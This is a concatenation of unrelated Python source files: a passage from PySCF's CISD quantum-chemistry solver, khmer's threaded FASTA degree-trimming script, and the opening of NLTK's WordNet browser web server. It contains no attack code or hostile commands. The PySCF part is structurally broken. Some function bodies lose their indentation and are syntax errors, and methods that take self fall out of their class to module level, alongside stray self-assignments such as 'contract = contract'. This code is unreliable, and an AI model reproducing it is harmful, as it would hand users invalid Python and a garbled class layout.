        # Total energy = SCF reference energy + CISD correlation energy.
        return numpy.asarray(self.e_corr) + self._scf.e_tot

    @property
    def nstates(self):
        # Alias of nroots, kept for API compatibility with other solvers.
        return self.nroots
    @nstates.setter
    def nstates(self, x):
        self.nroots = x

    @property
    def nocc(self):
        # Number of active occupied orbitals (frozen orbitals excluded);
        # delegates to ccsd.get_nocc.
        return self.get_nocc()
    @nocc.setter
    def nocc(self, n):
        self._nocc = n

    @property
    def nmo(self):
        # Number of active molecular orbitals (frozen orbitals excluded);
        # delegates to ccsd.get_nmo.
        return self.get_nmo()
    @nmo.setter
    def nmo(self, n):
        self._nmo = n
def vector_size(self):
'''The size of the vector which was returned from
:func:`amplitudes_to_cisdvec`
'''
nocc = self.nocc
nvir = self.nmo - nocc
return 1 + nocc*nvir + (nocc*nvir)**2
    def reset(self, mol=None):
        # Point the solver (and the underlying SCF object) at a new
        # molecule; used by the scanner between geometries.
        if mol is not None:
            self.mol = mol
        self._scf.reset(mol)
        return self
    # Borrow the frozen-orbital bookkeeping helpers from the CCSD module.
    get_nocc = ccsd.get_nocc
    get_nmo = ccsd.get_nmo
    get_frozen_mask = ccsd.get_frozen_mask

    def kernel(self, ci0=None, eris=None):
        # Standard PySCF entry point; delegates to cisd().
        return self.cisd(ci0, eris)
    def cisd(self, ci0=None, eris=None):
        '''Run the CISD iterations and store the results on self.

        Returns (e_corr, ci).
        '''
        if eris is None:
            eris = self.ao2mo(self.mo_coeff)
        if self.verbose >= logger.WARN:
            self.check_sanity()
        self.dump_flags()
        self.converged, self.e_corr, self.ci = \
                kernel(self, eris, ci0, max_cycle=self.max_cycle,
                       tol=self.conv_tol, verbose=self.verbose)
        self._finalize()
        return self.e_corr, self.ci
    def _finalize(self):
        # Log convergence status and final energies after the CI solver
        # finishes; returns self for chaining.
        citype = self.__class__.__name__
        if numpy.all(self.converged):
            logger.info(self, '%s converged', citype)
        else:
            logger.info(self, '%s not converged', citype)
        if self.nroots > 1:
            # One line per excited root.
            for i,e in enumerate(self.e_tot):
                logger.note(self, '%s root %d  E = %.16g', citype, i, e)
        else:
            logger.note(self, 'E(%s) = %.16g  E_corr = %.16g',
                        citype, self.e_tot, self.e_corr)
        return self
def get_init_guess(self, eris=None, nroots=1, diag=None):
    '''
    MP2 energy and MP2 initial guess(es) for CISD coefficients.

    Kwargs:
        eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
            Contains the various (pq|rs) integrals needed.
        nroots : integer
            Number of CISD solutions to be found.
        diag : numpy array (1D)
            e.g. CISD Hamiltonian diagonal in Slater determinant
            space with HF energy subtracted.

    Returns:
        Tuple of float and numpy array or
        tuple of float and list of numpy arrays (if nroots > 1)
        MP2 energy and initial guess(es) for CISD coefficients.
    '''
    if eris is None: eris = self.ao2mo(self.mo_coeff)
    nocc = self.nocc
    mo_e = eris.mo_energy
    # Orbital-energy denominators e_i - e_a.
    e_ia = lib.direct_sum('i-a->ia', mo_e[:nocc], mo_e[nocc:])
    ci0 = 1  # coefficient of the HF reference determinant
    # Singles guess from the occ-vir Fock block (vanishes for canonical
    # converged HF orbitals).
    ci1 = eris.fock[:nocc,nocc:] / e_ia
    eris_ovvo = _cp(eris.ovvo)
    # MP2-like doubles amplitudes built from the (ov|vo) integrals.
    ci2 = 2 * eris_ovvo.transpose(0,3,1,2)
    ci2 -= eris_ovvo.transpose(0,3,2,1)
    ci2 /= lib.direct_sum('ia,jb->ijab', e_ia, e_ia)
    self.emp2 = numpy.einsum('ijab,iabj', ci2, eris_ovvo)
    logger.info(self, 'Init t2, MP2 energy = %.15g', self.emp2)
    if abs(self.emp2) < 1e-3 and abs(ci1).sum() < 1e-3:
        # To avoid ci1 being stuck at local minimum
        ci1 = 1e-1 / e_ia
    ci_guess = amplitudes_to_cisdvec(ci0, ci1, ci2)
    if nroots > 1:
        civec_size = ci_guess.size
        dtype = ci_guess.dtype
        nroots = min(ci1.size+1, nroots)  # Consider Koopmans' theorem only
        if diag is None:
            idx = range(1, nroots)
        else:
            # Seed the extra roots on the lowest-diagonal determinants.
            idx = diag[:ci1.size+1].argsort()[1:nroots]  # exclude HF determinant
        ci_guess = [ci_guess]
        for i in idx:
            g = numpy.zeros(civec_size, dtype)
            g[i] = 1.0
            ci_guess.append(g)
    return self.emp2, ci_guess
# Hamiltonian-vector contraction and CI-Hamiltonian diagonal are taken from
# the module-level implementations.
contract = contract
make_diagonal = make_diagonal
def _dot(self, x1, x2, nmo=None, nocc=None):
    """Inner product of two CISD vectors via the module-level ``dot``."""
    nmo = self.nmo if nmo is None else nmo
    nocc = self.nocc if nocc is None else nocc
    return dot(x1, x2, nmo, nocc)
def ao2mo(self, mo_coeff=None):
    """Build the MO-basis two-electron integrals.

    Chooses between incore, density-fitted and outcore integral
    transformations based on an estimate of the required memory.
    """
    nmo = self.nmo
    nao = self.mo_coeff.shape[0]
    nmo_pair = nmo * (nmo+1) // 2
    nao_pair = nao * (nao+1) // 2
    # Rough incore footprint in MB: transform workspace plus packed MO ints.
    mem_incore = (max(nao_pair**2, nmo**4) + nmo_pair**2) * 8/1e6
    mem_now = lib.current_memory()[0]
    if (self._scf._eri is not None and
        (mem_incore+mem_now < self.max_memory) or self.mol.incore_anyway):
        return ccsd._make_eris_incore(self, mo_coeff)
    if getattr(self._scf, 'with_df', None):
        # The SCF object carries a density-fitting object; use the 3-index
        # tensors but warn that a dedicated DF solver is preferable.
        logger.warn(self, 'CISD detected DF being used in the HF object. '
                    'MO integrals are computed based on the DF 3-index tensors.\n'
                    'It\'s recommended to use dfccsd.CCSD for the '
                    'DF-CISD calculations')
        return ccsd._make_df_eris_outcore(self, mo_coeff)
    return ccsd._make_eris_outcore(self, mo_coeff)
def _add_vvvv(self, c2, eris, out=None, t2sym=None):
    # Contract the (vv|vv) integral block with the doubles coefficients via
    # the shared CCSD helper (t1=None, with_ovvv=False).
    return ccsd._add_vvvv(self, None, c2, eris, out, False, t2sym)
def to_fcivec(self, cisdvec, norb=None, nelec=None, frozen=None):
    """Expand a CISD coefficient vector into an FCI civec."""
    norb = self.nmo if norb is None else norb
    nelec = self.nocc * 2 if nelec is None else nelec
    return to_fcivec(cisdvec, norb, nelec, frozen)
def from_fcivec(self, fcivec, norb=None, nelec=None):
    """Contract an FCI civec down to the CISD coefficient vector."""
    norb = self.nmo if norb is None else norb
    nelec = self.nocc * 2 if nelec is None else nelec
    return from_fcivec(fcivec, norb, nelec)
# Density matrices, transition density and the scanner wrapper come from the
# module-level implementations.
make_rdm1 = make_rdm1
make_rdm2 = make_rdm2
trans_rdm1 = trans_rdm1
as_scanner = as_scanner
def dump_chk(self, ci=None, frozen=None, mo_coeff=None, mo_occ=None):
    """Save the CISD results (energy, CI vector, orbital info) to chkfile.

    A no-op (returning self) when no chkfile is configured.
    """
    if not self.chkfile:
        return self
    if ci is None:
        ci = self.ci
    if frozen is None:
        frozen = self.frozen
    # "None" cannot be serialized by the chkfile module
    if frozen is None:
        frozen = 0
    ci_chk = {'e_corr': self.e_corr, 'ci': ci, 'frozen': frozen}
    # Optional entries are stored only when they carry a value.
    for key, val in (('mo_coeff', mo_coeff), ('mo_occ', mo_occ),
                     ('_nmo', self._nmo), ('_nocc', self._nocc)):
        if val is not None:
            ci_chk[key] = val
    lib.chkfile.save(self.chkfile, 'cisd', ci_chk)
def amplitudes_to_cisdvec(self, c0, c1, c2):
    # Pack (c0, c1, c2) amplitudes into a flat vector (module-level helper).
    return amplitudes_to_cisdvec(c0, c1, c2)
def cisdvec_to_amplitudes(self, civec, nmo=None, nocc=None):
    """Unpack a flat CI vector into (c0, c1, c2) amplitudes."""
    nmo = self.nmo if nmo is None else nmo
    nocc = self.nocc if nocc is None else nocc
    return cisdvec_to_amplitudes(civec, nmo, nocc)
def density_fit(self):
    """Density-fitted CISD is not implemented for this class."""
    raise NotImplementedError
def nuc_grad_method(self):
    """Return the analytical nuclear-gradient solver for CISD."""
    # Imported lazily to avoid a circular dependency with pyscf.grad.
    from pyscf.grad import cisd
    return cisd.Gradients(self)
class RCISD(CISD):
    """Restricted (closed-shell) CISD; an alias of :class:`CISD`."""
    pass

from pyscf import scf
# Attach CISD as a method on RHF objects so that mf.CISD(...) works.
scf.hf.RHF.CISD = lib.class_as_method(RCISD)
# ROHF references are not supported by this restricted implementation.
scf.rohf.ROHF.CISD = None
def _cp(a):
return numpy.array(a, copy=False, order='C')
if __name__ == '__main__':
    # Smoke test: run CISD on water/STO-3G, then cross-check the energy
    # against the reduced density matrices via
    # E = tr(h1*rdm1) + 1/2 tr(h2*rdm2).
    from pyscf import gto
    from pyscf import ao2mo
    mol = gto.Mole()
    mol.verbose = 0
    mol.atom = [
        ['O', ( 0., 0. , 0. )],
        ['H', ( 0., -0.757, 0.587)],
        ['H', ( 0., 0.757 , 0.587)],]
    mol.basis = 'sto3g'
    mol.build()
    mf = scf.RHF(mol).run()
    myci = CISD(mf)
    eris = ccsd._make_eris_outcore(myci, mf.mo_coeff)
    ecisd, civec = myci.kernel(eris=eris)
    print(ecisd - -0.048878084082066106)  # vs reference correlation energy
    nmo = myci.nmo
    nocc = myci.nocc
    rdm1 = myci.make_rdm1(civec)
    rdm2 = myci.make_rdm2(civec)
    # NOTE(review): `reduce` is assumed to be imported (functools) near the
    # top of this file -- confirm.
    h1e = reduce(numpy.dot, (mf.mo_coeff.T, mf.get_hcore(), mf.mo_coeff))
    h2e = ao2mo.kernel(mf._eri, mf.mo_coeff)
    h2e = ao2mo.restore(1, h2e, nmo)
    e2 = (numpy.einsum('ij,ji', h1e, rdm1) +
          numpy.einsum('ijkl,ijkl', h2e, rdm2) * .5)
    print(ecisd + mf.e_tot - mol.energy_nuc() - e2)  # = 0
    # rdm1 must equal the partial trace of rdm2 over one electron.
    print(abs(rdm1 - numpy.einsum('ijkk->ji', rdm2)/(mol.nelectron-1)).sum())
|
split-fasta-on-degree-th.py | #! /usr/bin/env python
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import sys
import screed.fasta
import os
import khmer
import threading
import Queue
import gc
K = 31  # use K-1 for assembly K
HASHTABLE_SIZE = int(4e9)  # size passed to khmer.new_hashbits -- presumably
                           # entries per table; confirm against khmer docs
N_HT = 4  # number of hash tables backing the k-mer presence structure
###
MAX_DEGREE = 4  # degree threshold passed to ht.trim_on_degree
###
WORKER_THREADS = 8  # number of `process` worker threads
GROUPSIZE = 100  # approx. sequences per work unit handed to workers
class SequenceGroup(object):
    """An ordered batch of sequence records flowing through the queues."""

    def __init__(self, order, seqlist):
        # `order` preserves the input position of this batch so the writer
        # thread can reassemble output in the original order.
        self.order = order
        self.seqlist = seqlist
def process(inq, outq, ht):
    """Worker thread: pull SequenceGroups from inq, keep records whose
    degree-trimmed length exceeds K, and push survivors to outq.

    Runs until the global `done` flag is set and inq has drained, then
    decrements the global worker_count.  (Unused locals `last_record` and
    `name` from the original were removed.)
    """
    global worker_count
    while not done or not inq.empty():
        try:
            g = inq.get(True, 1)
        except Queue.Empty:
            continue

        keep = []
        for record in g.seqlist:
            seq = record['sequence']
            # trim_at marks where the node degree first exceeds MAX_DEGREE.
            trim_seq, trim_at = ht.trim_on_degree(seq, MAX_DEGREE)
            if trim_at > K:
                # NOTE(review): the *untrimmed* record is kept here
                # (trim_seq is discarded) -- confirm this is intended.
                keep.append(record)

        y = [(record['name'], record['sequence']) for record in keep]
        outq.put(SequenceGroup(g.order, y))
        gc.collect()

    worker_count -= 1
def write(outq, outfp):
    # Writer thread: collect processed groups from outq and emit them to
    # outfp in the original input order, buffering out-of-order arrivals.
    global worker_count
    groups = {}
    next_group = 0
    # Run until every worker has exited and the queue is drained.
    while worker_count > 0 or not outq.empty():
        try:
            g = outq.get(True, 1)
        except Queue.Empty:
            continue

        groups[g.order] = g

        # Flush every consecutive group starting at next_group.
        while next_group in groups:
            g = groups[next_group]
            for name, seq in g.seqlist:
                outfp.write('>%s\n%s\n' % (name, seq,))

            del groups[next_group]
            next_group += 1

        gc.collect()
        # Warn when many groups are buffered waiting for an earlier one.
        if len(groups) > 20:
            print 'WAITAMINIT: len(groups) is', len(groups)
def main():
    # Orchestrator: build the k-mer graph from the reference file, start
    # worker/writer threads, then stream batches of input sequences through
    # the queues.
    global ht, done, worker_count
    done = False
    worker_count = 0

    repfile = sys.argv[1]    # FASTA consumed to populate the hashtable
    infile = sys.argv[2]     # FASTA to be filtered
    outprefix = sys.argv[3]

    lowfile = outprefix + '.low'
    highfile = outprefix + '.high'

    print 'saving low-density to:', lowfile
    print 'saving high-density to:', highfile

    print 'making hashtable'
    ht = khmer.new_hashbits(K, HASHTABLE_SIZE, N_HT)

    lowfp = open(lowfile, 'w')
    # highfp = open(highfile, 'w')

    print 'eating', repfile
    ht.consume_fasta(repfile)

    inqueue = Queue.Queue(50)
    outqueue = Queue.Queue(50)

    # worker and writer threads
    for i in range(WORKER_THREADS):
        t = threading.Thread(target=process, args=(inqueue, outqueue, ht))
        worker_count += 1
        t.start()

    threading.Thread(target=write, args=(outqueue, lowfp)).start()

    # main thread: batch records into SequenceGroups of ~GROUPSIZE records.
    x = []
    i = 0
    group_n = 0
    for n, record in enumerate(
            screed.fasta.fasta_iter(open(infile), parse_description=False)):
        if n % 10000 == 0:
            print '...', n

        i += 1
        if i > GROUPSIZE:
            x.append(record)
            g = SequenceGroup(group_n, x)
            inqueue.put(g)

            x = []
            group_n += 1
            i = 0
        else:
            x.append(record)

    # submit last set of sequences
    g = SequenceGroup(group_n, x)
    inqueue.put(g)

    # Signal workers to drain their queue and exit.
    done = True
main()
# vim: set ft=python ts=4 sts=4 sw=4 et tw=79:
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2013 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shutdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
# True until the first browser client has been served its index page.
firstClient = True

# True if we're not also running a web browser.  The value of server_mode
# gets set by wnb().
server_mode = None

# If set, this is a file object for writing log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
    """HTTP handler for the Wordnet browser: dispatches on the request path
    to static pages, word searches and encoded reference lookups."""

    def do_HEAD(self):
        self.send_head()

    def do_GET(self):
        global firstClient
        sp = self.path[1:]  # request path without the leading '/'
        if compat.unquote_plus(sp) == 'SHUTDOWN THE SERVER':
            # Remote shutdown is only honoured when a browser was launched
            # by us (i.e. not in server mode).
            if server_mode:
                page = "Server must be killed with SIGTERM."
                type = "text/plain"
            else:
                print('Server shutting down!')
                os._exit(0)

        elif sp == '': # First request.
            type = 'text/html'
            if not server_mode and firstClient:
                firstClient = False
                page = get_static_index_page(True)
            else:
                page = get_static_index_page(False)
            word = 'green'

        elif sp.endswith('.html'): # Trying to fetch a HTML file TODO:
            type = 'text/html'
            usp = compat.unquote_plus(sp)
            if usp == 'NLTK Wordnet Browser Database Info.html':
                word = '* Database Info *'
                if os.path.isfile(usp):
                    page = open(usp).read()
                else:
                    # Point the user at the script that generates the file.
                    page = (html_header % word) + \
                        '<p>The database info file:'\
                        '<p><b>' + usp + '</b>' + \
                        '<p>was not found. Run this:' + \
                        '<p><b>python dbinfo_html.py</b>' + \
                        '<p>to produce it.' + html_trailer
            else:
                # Handle files here.
                word = sp
                page = get_static_page_by_path(usp)

        elif sp.startswith("search"):
            # This doesn't seem to work with MWEs.
            type = 'text/html'
            parts = (sp.split("?")[1]).split("&")
            # Extract the value of the nextWord query parameter.
            word = [p.split("=")[1].replace("+", " ")
                    for p in parts if p.startswith("nextWord")][0]
            page, word = page_from_word(word)

        elif sp.startswith("lookup_"):
            # TODO add a variation of this that takes a non ecoded word or MWE.
            type = 'text/html'
            sp = sp[len("lookup_"):]
            page, word = page_from_href(sp)

        elif sp == "start_page":
            # if this is the first request we should display help
            # information, and possibly set a default word.
            type = 'text/html'
            page, word = page_from_word("wordnet")

        else:
            type = 'text/plain'
            page = "Could not parse request: '%s'" % sp

        # Send result.
        self.send_head(type)
        self.wfile.write(page.encode('utf8'))

    def send_head(self, type=None):
        # Shared response-header writer; `type` is the Content-type.
        self.send_response(200)
        self.send_header('Content-type', type)
        self.end_headers()

    def log_message(self, format, *args):
        # Route BaseHTTPRequestHandler log lines to the module logfile;
        # silently dropped when no logfile was configured.
        global logfile
        if logfile:
            logfile.write(
                "%s - - [%s] %s\n" %
                (self.address_string(),
                 self.log_date_time_string(),
                 format%args))
def get_unique_counter_from_url(sp):
    """
    Extract the unique counter from the URL if it has one (encoded after a
    '%23', i.e. an URL-escaped '#').  Otherwise return None.
    """
    marker = sp.rfind('%23')
    return int(sp[marker + 3:]) if marker != -1 else None
def wnb(port=8000, runBrowser=True, logfilename=None):
    """
    Run NLTK Wordnet Browser Server.

    :param port: The port number for the server to listen on, defaults to
                 8000
    :type  port: int

    :param runBrowser: True to start a web browser and point it at the web
                       server.
    :type  runBrowser: bool

    :param logfilename: if given, messages are appended (line-buffered) to
                        this file; exits with status 1 if it cannot be opened.
    """
    # The webbrowser module is unpredictable, typically it blocks if it uses
    # a console web browser, and doesn't block if it uses a GUI webbrowser,
    # so we need to force it to have a clear correct behaviour.
    #
    # Normally the server should run for as long as the user wants. they
    # should idealy be able to control this from the UI by closing the
    # window or tab.  Second best would be clicking a button to say
    # 'Shutdown' that first shutsdown the server and closes the window or
    # tab, or exits the text-mode browser.  Both of these are unfreasable.
    #
    # The next best alternative is to start the server, have it close when
    # it receives SIGTERM (default), and run the browser as well.  The user
    # may have to shutdown both programs.
    #
    # Since webbrowser may block, and the webserver will block, we must run
    # them in separate threads.
    #
    # BUG FIX: only `path` and `argv` are imported from sys at module level,
    # so the error path below used to raise NameError on sys.stderr/sys.exit.
    import sys

    global server_mode, logfile
    server_mode = not runBrowser

    # Setup logging.
    if logfilename:
        try:
            logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
        except IOError as e:
            # BUG FIX: file.write() takes a single string; the arguments
            # were previously passed printf-style and raised TypeError.
            sys.stderr.write("Couldn't open %s for writing: %s" %
                             (logfilename, e))
            sys.exit(1)
    else:
        logfile = None

    # Compute URL and start web browser
    url = 'http://localhost:' + str(port)

    if runBrowser:
        server_ready = threading.Event()
        browser_thread = startBrowser(url, server_ready)

    # Start the server.
    server = HTTPServer(('', port), MyServerHandler)
    if logfile:
        logfile.write(
            'NLTK Wordnet browser server running serving: %s\n' % url)
    if runBrowser:
        server_ready.set()

    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass

    if runBrowser:
        browser_thread.join()
def startBrowser(url, server_ready):
    """Open *url* in a browser tab once *server_ready* fires.

    Returns the helper Thread so the caller can join() it.
    """
    def _open_when_ready():
        server_ready.wait()
        # Wait a little bit more, there's still the chance of a race
        # condition.
        time.sleep(1)
        webbrowser.open(url, new=2, autoraise=1)

    thread = threading.Thread(target=_open_when_ready)
    thread.start()
    return thread
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
    """Return (wn constant, abbreviation, display name) triples for the
    supported parts of speech."""
    return [
        (wn.NOUN, 'N', 'noun'),
        (wn.VERB, 'V', 'verb'),
        (wn.ADJ, 'J', 'adj'),
        (wn.ADV, 'R', 'adv'),
    ]
def _pos_match(pos_tuple):
    """
    Return the complete pos tuple for the partial pos tuple given to it,
    matching on the first non-null component; None when nothing matches.
    """
    # Satellite adjectives are folded into plain adjectives.
    if pos_tuple[0] == 's':
        pos_tuple = ('a', pos_tuple[1], pos_tuple[2])

    # Index of the first non-null component (falls through to the last
    # index when every component is None, matching the original loop).
    for idx, component in enumerate(pos_tuple):
        if component is not None:
            break

    for candidate in _pos_tuples():
        if candidate[idx] == pos_tuple[idx]:
            return candidate
    return None
# Relation-type identifiers used as keys in Reference.synset_relations.
# NOTE: the original code assigned CLASS_REGIONAL, CLASS_USAGE and
# CLASS_CATEGORY twice each; only the final binding of a duplicated name
# was ever effective, so the earlier (dead) assignments were removed and
# the surviving values are listed in numeric order.
HYPONYM = 0
HYPERNYM = 1
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
CLASS_CATEGORY = 11
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_REGIONAL = 23
CLASS_USAGE = 24
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
    """Apply *func* to each lemma of *synset* whose name equals *word*,
    concatenating the resulting lists."""
    collected = []
    for lemma in synset.lemmas:
        if lemma.name == word:
            collected.extend(func(lemma))
    return collected
def rebuild_tree(orig_tree):
    """Convert a wn-style tree (a list whose head is the node and whose
    tail holds subtree lists) into nested (node, children) tuples."""
    head, subtrees = orig_tree[0], orig_tree[1:]
    return (head, [rebuild_tree(subtree) for subtree in subtrees])
def get_relations_data(word, synset):
    """
    Get synset relations data for a synset.  Note that this doesn't
    yet support things such as full hyponym vs direct hyponym.

    Returns a tuple of (relation_id, display_name, related_items)
    triples appropriate for the synset's part of speech; raises
    TypeError for an unrecognised POS.
    """
    if synset.pos == wn.NOUN:
        return ((HYPONYM, 'Hyponyms',
                 synset.hyponyms()),
                (INSTANCE_HYPONYM , 'Instance hyponyms',
                 synset.instance_hyponyms()),
                (HYPERNYM, 'Direct hypernyms',
                 synset.hypernyms()),
                # Full hypernym chain rendered as a tree (root dropped).
                (INDIRECT_HYPERNYMS, 'Indirect hypernyms',
                 rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
                # hypernyms', 'Sister terms',
                (INSTANCE_HYPERNYM , 'Instance hypernyms',
                 synset.instance_hypernyms()),
                # (CLASS_REGIONAL, ['domain term region'], ),
                (PART_HOLONYM, 'Part holonyms',
                 synset.part_holonyms()),
                (PART_MERONYM, 'Part meronyms',
                 synset.part_meronyms()),
                (SUBSTANCE_HOLONYM, 'Substance holonyms',
                 synset.substance_holonyms()),
                (SUBSTANCE_MERONYM, 'Substance meronyms',
                 synset.substance_meronyms()),
                (MEMBER_HOLONYM, 'Member holonyms',
                 synset.member_holonyms()),
                (MEMBER_MERONYM, 'Member meronyms',
                 synset.member_meronyms()),
                (ATTRIBUTE, 'Attributes',
                 synset.attributes()),
                # Lexical (word-level) relations follow.
                (ANTONYM, "Antonyms",
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
                 lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
    elif synset.pos == wn.VERB:
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (HYPONYM, 'Hyponym',
                 synset.hyponyms()),
                (HYPERNYM, 'Direct hypernyms',
                 synset.hypernyms()),
                (INDIRECT_HYPERNYMS, 'Indirect hypernyms',
                 rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
                (ENTAILMENT, 'Entailments',
                 synset.entailments()),
                (CAUSE, 'Causes',
                 synset.causes()),
                (ALSO_SEE, 'Also see',
                 synset.also_sees()),
                (VERB_GROUP, 'Verb Groups',
                 synset.verb_groups()),
                (DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
                 lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
    elif synset.pos == wn.ADJ or synset.pos == wn.ADJ_SAT:
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),
                (SIMILAR, 'Similar to',
                 synset.similar_tos()),
                # Participle of verb - not supported by corpus
                (PERTAINYM, 'Pertainyms',
                 lemma_property(word, synset, lambda l: l.pertainyms())),
                (ATTRIBUTE, 'Attributes',
                 synset.attributes()),
                (ALSO_SEE, 'Also see',
                 synset.also_sees()))
    elif synset.pos == wn.ADV:
        # This is weird. adverbs such as 'quick' and 'fast' don't seem
        # to have antonyms returned by the corpus.a
        return ((ANTONYM, 'Antonym',
                 lemma_property(word, synset, lambda l: l.antonyms())),)
        # Derived from adjective - not supported by corpus
    else:
        raise TypeError("Unhandles synset POS type: " + str(synset.pos))
# Page skeleton: html_header receives the current word via %s for the
# <title>; html_trailer closes the document.
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''

html_trailer = '''
</body>
</html>
'''

# Help text shown above the example search output on the start page.
explanation  = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt): return '<b>%s</b>' % txt
def _center(txt): return '<center>%s</center>' % txt
def _hlev(n,txt): return '<h%d>%s</h%d>' % (n,txt,n)
def _italic(txt): return '<i>%s</i>' % txt
def _li(txt): return '<li>%s</li>' % txt
def pg(word, body):
    '''
    Return a HTML page of NLTK Browser format constructed from the
    word and body.

    :param word: The word that the body corresponds to
    :type word: str
    :param body: The HTML body corresponding to the word
    :type body: str
    :return: a HTML page for the word-body combination
    :rtype: str
    '''
    header = html_header % word
    return header + body + html_trailer
def _ul(txt):
    """Wrap *txt* in an unordered-list tag."""
    return '<ul>' + txt + '</ul>'

def _abbc(txt):
    """
    abbc = asterisks, breaks, bold, center
    """
    decorated = '<br>' * 10 + '*' * 10 + ' ' + txt + ' ' + '*' * 10
    return _center(_bold(decorated))

# Marker appended when a hyponym listing is truncated.
full_hyponym_cont_text = \
    _ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
    """
    The synset key is the unique name of the synset; this can be
    retrieved via synset.name
    """
    return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
    '''
    Returns the HTML string for one synset or word

    :param word: the current word
    :type word: str
    :param synset: a synset
    :type synset: synset
    :param synset_relations: information about which synset relations
    to display.
    :type synset_relations: dict(synset_key, set(relation_id))
    :return: The HTML string built for this synset
    :rtype: str
    '''
    if isinstance(synset, tuple): # It's a word
        raise NotImplementedError("word not supported by _collect_one_synset")

    typ = 'S'
    pos_tuple = _pos_match((synset.pos, None, None))
    assert pos_tuple is not None, "pos_tuple is null: synset.pos: %s" % synset.pos
    descr = pos_tuple[2]

    # The 'S:' link toggles display of this synset's relations; deepcopy so
    # the caller's shared Reference state is not mutated.
    ref = copy.deepcopy(Reference(word, synset_relations))
    ref.toggle_synset(synset)
    synset_label = typ + ";"
    if synset.name in synset_relations:
        synset_label = _bold(synset_label)
    s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)

    def format_lemma(w):
        # Lemmas matching the search word are bolded; the rest become links.
        w = w.replace('_', ' ')
        if w.lower() == word:
            return _bold(w)
        else:
            ref = Reference(w)
            return make_lookup_link(ref, w)

    s += ', '.join(format_lemma(l.name) for l in synset.lemmas)

    # Definition plus example sentences in italics.
    gl = " (%s) <i>%s</i> " % \
        (synset.definition,
         "; ".join("\"%s\"" % e for e in synset.examples))
    return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
